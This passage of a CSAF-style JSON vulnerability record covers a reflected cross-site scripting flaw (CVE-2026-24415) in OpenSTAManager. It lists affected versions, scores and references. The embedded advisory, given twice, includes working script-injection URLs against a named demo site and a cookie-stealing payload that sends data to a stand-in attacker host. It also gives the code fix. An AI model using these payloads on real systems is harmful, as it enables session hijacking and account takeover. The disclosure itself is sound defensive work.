                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.9-beta"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.9.1",
                                "product": {
                                    "name": "vers:unknown/v2.9.1",
                                    "product_id": "CSAFPID-5197983",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.9.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.9.2",
                                "product": {
                                    "name": "vers:unknown/v2.9.2",
                                    "product_id": "CSAFPID-5197795",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.9.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.9.3",
                                "product": {
                                    "name": "vers:unknown/v2.9.3",
                                    "product_id": "CSAFPID-5197796",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.9.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.9.4",
                                "product": {
                                    "name": "vers:unknown/v2.9.4",
                                    "product_id": "CSAFPID-5197797",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.9.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.9.5",
                                "product": {
                                    "name": "vers:unknown/v2.9.5",
                                    "product_id": "CSAFPID-5507007",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.9.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.9.6",
                                "product": {
                                    "name": "vers:unknown/v2.9.6",
                                    "product_id": "CSAFPID-5507008",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.9.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.9.7",
                                "product": {
                                    "name": "vers:unknown/v2.9.7",
                                    "product_id": "CSAFPID-5507009",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.9.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.9.8",
                                "product": {
                                    "name": "vers:unknown/v2.9.8",
                                    "product_id": "CSAFPID-5507010",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.9.8"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "openstamanager"
                    }
                ],
                "category": "vendor",
                "name": "devcode-it"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-24415",
            "cwe": {
                "id": "CWE-79",
                "name": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "### Summary\n\nMultiple Reflected Cross-Site Scripting (XSS) vulnerabilities in OpenSTAManager v2.9.8 allow unauthenticated attackers to execute arbitrary JavaScript code in the context of other users' browsers through crafted URL parameters, potentially leading to session hijacking, credential theft, and unauthorized actions.\n\n**Vulnerable Parameter:** `righe` (GET)\n\n### Details\n\nOpenSTAManager v2.9.8 contains multiple Reflected XSS vulnerabilities in invoice/order/contract modification modals. The application fails to properly sanitize user-supplied input from the `righe` GET parameter before reflecting it in HTML output.\n\n**Vulnerable Code Location:**\nFile: `/modules/contratti/modals/modifica_iva.php` (Line 125)\n\n```php\n<input type=\"hidden\" name=\"righe\" value=\"<?php echo $_GET['righe']; ?>\">\n```\n\nThe `$_GET['righe']` parameter is directly echoed into the HTML `value` attribute without any sanitization using `htmlspecialchars()` or equivalent functions. This allows an attacker to break out of the attribute context and inject arbitrary HTML/JavaScript.\n\n**All Affected Files:**\n\n1. `/modules/contratti/modals/modifica_iva.php` - **Line 125, Line 167**\n2. `/modules/preventivi/modals/modifica_iva.php` - **Line 125, Line 167**\n3. `/modules/fatture/modals/modifica_iva.php` - **Line 121, Line 161**\n4. `/modules/ddt/modals/modifica_iva.php` - **Line 125, Line 167**\n5. `/modules/ordini/modals/modifica_iva.php` - **Line 125, Line 167**\n6. `/modules/interventi/modals/modifica_iva.php` - **Line 125, Line 167**\n\n### PoC\n\n**Prerequisites:**\n- Running instance of OpenSTAManager v2.9.8\n- Valid admin credentials (username: admin, password: admin for test instance)\n\n**Step 1: Login**\n```bash\ncurl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \\\n  -d 'username=admin&password=admin'\n```\n\n**Step 2: Trigger XSS**\nNavigate to the following URL in a browser (or use curl with cookies):\n```\nhttp://localhost:8081/modules/contratti/modals/modifica_iva.php?righe=\"><script>alert(document.domain)</script>\n```\n\n**Tested URLs (All vulnerable):**\n- `https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe=\"><script>alert(document.cookie)</script>`\n- `https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1\"><script>alert(document.cookie)</script>`\n- `https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe=\"><script>alert(document.cookie)</script>`\n- `https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe=\"><script>alert(document.cookie)</script>`\n- `https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe=\"><script>alert(document.cookie)</script>`\n- `https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe=\"><script>alert(document.cookie)</script>`\n\n**Expected Result:**\nJavaScript alert popup displays showing the current session cookie, confirming code execution.\n\n**HTML Output (verified on live instance):**\n```html\n<input type=\"hidden\" name=\"righe\" value=\"\"><script>alert(document.cookie)</script>\">\n```\n\n**Verification:**\n\n<img width=\"1260\" height=\"99\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4e91a461-bae6-40fb-b7c3-b8bd1eb48473\" />\n\n<img width=\"2060\" height=\"1180\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6dbde967-0505-43d1-b455-adc91a4808c0\" />\n\n**Alternative Payloads:**\nSession stealing: `\"><script>fetch('https://attacker.com/?c='+document.cookie)</script>`\n\n### Impact\n\n\n**Affected Users:** All authenticated users with access to contracts, invoices, quotes, or orders modules.\n\n**Attack Scenario:**\n1. Attacker crafts malicious URL with XSS payload\n2. Attacker sends URL to victim via email/chat/phishing\n3. Victim (authenticated user) clicks the link\n4. Malicious JavaScript executes in victim's browser context\n5. Attacker can:\n   - Steal session cookies → Full account takeover\n   - Perform actions on behalf of victim (create/modify/delete records)\n   - Steal CSRF tokens and bypass CSRF protection\n   - Redirect to phishing page\n   - Inject keylogger to capture sensitive data\n   - Modify page content to trick user into revealing credentials\n\n\n**Recommended Fix:**\n```php\n<input type=\"hidden\" name=\"righe\" value=\"<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>\">\n```\n\nApply this fix to all affected files listed in Details section.",
                    "title": "github - https://github.com/advisories/GHSA-jfgp-g7x7-j25j"
                },
                {
                    "category": "description",
                    "text": "OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contains Reflected XSS vulnerabilities in invoice/order/contract modification modals. The application fails to properly sanitize user-supplied input from the righe GET parameter before reflecting it in HTML output.The $_GET['righe'] parameter is directly echoed into the HTML value attribute without any sanitization using htmlspecialchars() or equivalent functions. This allows an attacker to break out of the attribute context and inject arbitrary HTML/JavaScript.",
                    "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-24415"
                },
                {
                    "category": "description",
                    "text": "OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contains Reflected XSS vulnerabilities in invoice/order/contract modification modals. The application fails to properly sanitize user-supplied input from the righe GET parameter before reflecting it in HTML output.The $_GET['righe'] parameter is directly echoed into the HTML value attribute without any sanitization using htmlspecialchars() or equivalent functions. This allows an attacker to break out of the attribute context and inject arbitrary HTML/JavaScript.",
                    "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-24415"
                },
                {
                    "category": "description",
                    "text": "### Summary\n\nMultiple Reflected Cross-Site Scripting (XSS) vulnerabilities in OpenSTAManager v2.9.8 allow unauthenticated attackers to execute arbitrary JavaScript code in the context of other users' browsers through crafted URL parameters, potentially leading to session hijacking, credential theft, and unauthorized actions.\n\n**Vulnerable Parameter:** `righe` (GET)\n\n### Details\n\nOpenSTAManager v2.9.8 contains multiple Reflected XSS vulnerabilities in invoice/order/contract modification modals. The application fails to properly sanitize user-supplied input from the `righe` GET parameter before reflecting it in HTML output.\n\n**Vulnerable Code Location:**\nFile: `/modules/contratti/modals/modifica_iva.php` (Line 125)\n\n```php\n<input type=\"hidden\" name=\"righe\" value=\"<?php echo $_GET['righe']; ?>\">\n```\n\nThe `$_GET['righe']` parameter is directly echoed into the HTML `value` attribute without any sanitization using `htmlspecialchars()` or equivalent functions. This allows an attacker to break out of the attribute context and inject arbitrary HTML/JavaScript.\n\n**All Affected Files:**\n\n1. `/modules/contratti/modals/modifica_iva.php` - **Line 125, Line 167**\n2. `/modules/preventivi/modals/modifica_iva.php` - **Line 125, Line 167**\n3. `/modules/fatture/modals/modifica_iva.php` - **Line 121, Line 161**\n4. `/modules/ddt/modals/modifica_iva.php` - **Line 125, Line 167**\n5. `/modules/ordini/modals/modifica_iva.php` - **Line 125, Line 167**\n6. `/modules/interventi/modals/modifica_iva.php` - **Line 125, Line 167**\n\n### PoC\n\n**Prerequisites:**\n- Running instance of OpenSTAManager v2.9.8\n- Valid admin credentials (username: admin, password: admin for test instance)\n\n**Step 1: Login**\n```bash\ncurl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \\\n  -d 'username=admin&password=admin'\n```\n\n**Step 2: Trigger XSS**\nNavigate to the following URL in a browser (or use curl with cookies):\n```\nhttp://localhost:8081/modules/contratti/modals/modifica_iva.php?righe=\"><script>alert(document.domain)</script>\n```\n\n**Tested URLs (All vulnerable):**\n- `https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe=\"><script>alert(document.cookie)</script>`\n- `https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1\"><script>alert(document.cookie)</script>`\n- `https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe=\"><script>alert(document.cookie)</script>`\n- `https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe=\"><script>alert(document.cookie)</script>`\n- `https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe=\"><script>alert(document.cookie)</script>`\n- `https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe=\"><script>alert(document.cookie)</script>`\n\n**Expected Result:**\nJavaScript alert popup displays showing the current session cookie, confirming code execution.\n\n**HTML Output (verified on live instance):**\n```html\n<input type=\"hidden\" name=\"righe\" value=\"\"><script>alert(document.cookie)</script>\">\n```\n\n**Verification:**\n\n<img width=\"1260\" height=\"99\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4e91a461-bae6-40fb-b7c3-b8bd1eb48473\" />\n\n<img width=\"2060\" height=\"1180\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6dbde967-0505-43d1-b455-adc91a4808c0\" />\n\n**Alternative Payloads:**\nSession stealing: `\"><script>fetch('https://attacker.com/?c='+document.cookie)</script>`\n\n### Impact\n\n\n**Affected Users:** All authenticated users with access to contracts, invoices, quotes, or orders modules.\n\n**Attack Scenario:**\n1. Attacker crafts malicious URL with XSS payload\n2. Attacker sends URL to victim via email/chat/phishing\n3. Victim (authenticated user) clicks the link\n4. Malicious JavaScript executes in victim's browser context\n5. Attacker can:\n   - Steal session cookies → Full account takeover\n   - Perform actions on behalf of victim (create/modify/delete records)\n   - Steal CSRF tokens and bypass CSRF protection\n   - Redirect to phishing page\n   - Inject keylogger to capture sensitive data\n   - Modify page content to trick user into revealing credentials\n\n\n**Recommended Fix:**\n```php\n<input type=\"hidden\" name=\"righe\" value=\"<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>\">\n```\n\nApply this fix to all affected files listed in Details section.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-jfgp-g7x7-j25j.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contains Reflected XSS vulnerabilities in invoice/order/contract modification modals. The application fails to properly sanitize user-supplied input from the righe GET parameter before reflecting it in HTML output.The $_GET['righe'] parameter is directly echoed into the HTML value attribute without any sanitization using htmlspecialchars() or equivalent functions. This allows an attacker to break out of the attribute context and inject arbitrary HTML/JavaScript.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-24415.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00036",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
                    "title": "CVSSV4"
                },
                {
                    "category": "other",
                    "text": "5.1",
                    "title": "CVSSV4 base score"
                },
                {
                    "category": "other",
                    "text": "3.7",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "The value of the most recent CVSS (V3) score, There is exploit data available from source Nvd, Is related to (a version of) an uncommon product",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5528647",
                    "CSAFPID-3502394",
                    "CSAFPID-3502395",
                    "CSAFPID-3502396",
                    "CSAFPID-3502397",
                    "CSAFPID-3502398",
                    "CSAFPID-3502399",
                    "CSAFPID-3502400",
                    "CSAFPID-3502401",
                    "CSAFPID-3502402",
                    "CSAFPID-3502403",
                    "CSAFPID-3502404",
                    "CSAFPID-3502405",
                    "CSAFPID-3502406",
                    "CSAFPID-3502407",
                    "CSAFPID-3502408",
                    "CSAFPID-3502409",
                    "CSAFPID-3502410",
                    "CSAFPID-3502411",
                    "CSAFPID-3502412",
                    "CSAFPID-3502413",
                    "CSAFPID-3502414",
                    "CSAFPID-3502415",
                    "CSAFPID-3502416",
                    "CSAFPID-3502417",
                    "CSAFPID-5197754",
                    "CSAFPID-5197755",
                    "CSAFPID-5197756",
                    "CSAFPID-5197757",
                    "CSAFPID-5197758",
                    "CSAFPID-5197759",
                    "CSAFPID-5197760",
                    "CSAFPID-5197761",
                    "CSAFPID-5197762",
                    "CSAFPID-5197763",
                    "CSAFPID-5197764",
                    "CSAFPID-5197765",
                    "CSAFPID-5197766",
                    "CSAFPID-5197767",
                    "CSAFPID-5197768",
                    "CSAFPID-5197769",
                    "CSAFPID-5197770",
                    "CSAFPID-5197771",
                    "CSAFPID-5197772",
                    "CSAFPID-5197773",
                    "CSAFPID-5197774",
                    "CSAFPID-5197775",
                    "CSAFPID-5197776",
                    "CSAFPID-5197777",
                    "CSAFPID-5197778",
                    "CSAFPID-5197779",
                    "CSAFPID-5197780",
                    "CSAFPID-5197781",
                    "CSAFPID-5197782",
                    "CSAFPID-5197783",
                    "CSAFPID-5197784",
                    "CSAFPID-5197785",
                    "CSAFPID-5197786",
                    "CSAFPID-5197787",
                    "CSAFPID-5197788",
                    "CSAFPID-5197789",
                    "CSAFPID-5197790",
                    "CSAFPID-5197791",
                    "CSAFPID-5197792",
                    "CSAFPID-5197793",
                    "CSAFPID-5197794",
                    "CSAFPID-5197795",
                    "CSAFPID-5197796",
                    "CSAFPID-5197797",
                    "CSAFPID-5197969",
                    "CSAFPID-5197970",
                    "CSAFPID-5197971",
                    "CSAFPID-5197972",
                    "CSAFPID-5197973",
                    "CSAFPID-5197974",
                    "CSAFPID-5197975",
                    "CSAFPID-5197976",
                    "CSAFPID-5197977",
                    "CSAFPID-5197978",
                    "CSAFPID-5197979",
                    "CSAFPID-5197980",
                    "CSAFPID-5197981",
                    "CSAFPID-5197982",
                    "CSAFPID-5197983",
                    "CSAFPID-5507007",
                    "CSAFPID-5507008",
                    "CSAFPID-5507009",
                    "CSAFPID-5759021",
                    "CSAFPID-5585950",
                    "CSAFPID-5197750",
                    "CSAFPID-5197751",
                    "CSAFPID-5197752",
                    "CSAFPID-5197753",
                    "CSAFPID-5507010"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://github.com/advisories/GHSA-jfgp-g7x7-j25j"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-jfgp-g7x7-j25j"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24415"
                },
                {
                    "category": "external",
                    "summary": "Source raw - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-24415"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-24415"
                },
                {
                    "category": "external",
                    "summary": "Source raw - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/24xxx/CVE-2026-24415.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24415"
                },
                {
                    "category": "external",
                    "summary": "Source raw - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-jfgp-g7x7-j25j.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-24415.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-jfgp-g7x7-j25j"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-jfgp-g7x7-j25j"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24415"
                },
                {
                    "category": "external",
                    "summary": "Reference - osv",
                    "url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/24xxx/CVE-2026-24415.json"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                        "baseScore": 6.1,
                        "baseSeverity": "MEDIUM"
                    },
                    "products": [
                        "CSAFPID-3502394",
                        "CSAFPID-3502395",
                        "CSAFPID-3502396",
                        "CSAFPID-3502397",
                        "CSAFPID-3502398",
                        "CSAFPID-3502399",
                        "CSAFPID-3502400",
                        "CSAFPID-3502401",
                        "CSAFPID-3502402",
                        "CSAFPID-3502403",
                        "CSAFPID-3502404",
                        "CSAFPID-3502405",
                        "CSAFPID-3502406",
                        "CSAFPID-3502407",
                        "CSAFPID-3502408",
                        "CSAFPID-3502409",
                        "CSAFPID-3502410",
                        "CSAFPID-3502411",
                        "CSAFPID-3502412",
                        "CSAFPID-3502413",
                        "CSAFPID-3502414",
                        "CSAFPID-3502415",
                        "CSAFPID-3502416",
                        "CSAFPID-3502417",
                        "CSAFPID-5197750",
                        "CSAFPID-5197751",
                        "CSAFPID-5197752",
                        "CSAFPID-5197753",
                        "CSAFPID-5197754",
                        "CSAFPID-5197755",
                        "CSAFPID-5197756",
                        "CSAFPID-5197757",
                        "CSAFPID-5197758",
                        "CSAFPID-5197759",
                        "CSAFPID-5197760",
                        "CSAFPID-5197761",
                        "CSAFPID-5197762",
                        "CSAFPID-5197763",
                        "CSAFPID-5197764",
                        "CSAFPID-5197765",
                        "CSAFPID-5197766",
                        "CSAFPID-5197767",
                        "CSAFPID-5197768",
                        "CSAFPID-5197769",
                        "CSAFPID-5197770",
                        "CSAFPID-5197771",
                        "CSAFPID-5197772",
                        "CSAFPID-5197773",
                        "CSAFPID-5197774",
                        "CSAFPID-5197775",
                        "CSAFPID-5197776",
                        "CSAFPID-5197777",
                        "CSAFPID-5197778",
                        "CSAFPID-5197779",
                        "CSAFPID-5197780",
                        "CSAFPID-5197781",
                        "CSAFPID-5197782",
                        "CSAFPID-5197783",
                        "CSAFPID-5197784",
                        "CSAFPID-5197785",
                        "CSAFPID-5197786",
                        "CSAFPID-5197787",
                        "CSAFPID-5197788",
                        "CSAFPID-5197789",
                        "CSAFPID-5197790",
                        "CSAFPID-5197791",
                        "CSAFPID-5197792",
                        "CSAFPID-5197793",
                        "CSAFPID-5197794",
                        "CSAFPID-5197795",
                        "CSAFPID-5197796",
                        "CSAFPID-5197797",
                        "CSAFPID-5197969",
                        "CSAFPID-5197970",
                        "CSAFPID-5197971",
                        "CSAFPID-5197972",
                        "CSAFPID-5197973",
                        "CSAFPID-5197974",
                        "CSAFPID-5197975",
                        "CSAFPID-5197976",
                        "CSAFPID-5197977",
                        "CSAFPID-5197978",
                        "CSAFPID-5197979",
                        "CSAFPID-5197980",
                        "CSAFPID-5197981",
                        "CSAFPID-5197982",
                        "CSAFPID-5197983",
                        "CSAFPID-5507007",
                        "CSAFPID-5507008",
                        "CSAFPID-5507009",
                        "CSAFPID-5507010",
                        "CSAFPID-5528647",
                        "CSAFPID-5585950",
                        "CSAFPID-5759021"
                    ]
                }
            ],
            "title": "CVE-2026-24415"
        }
    ]
}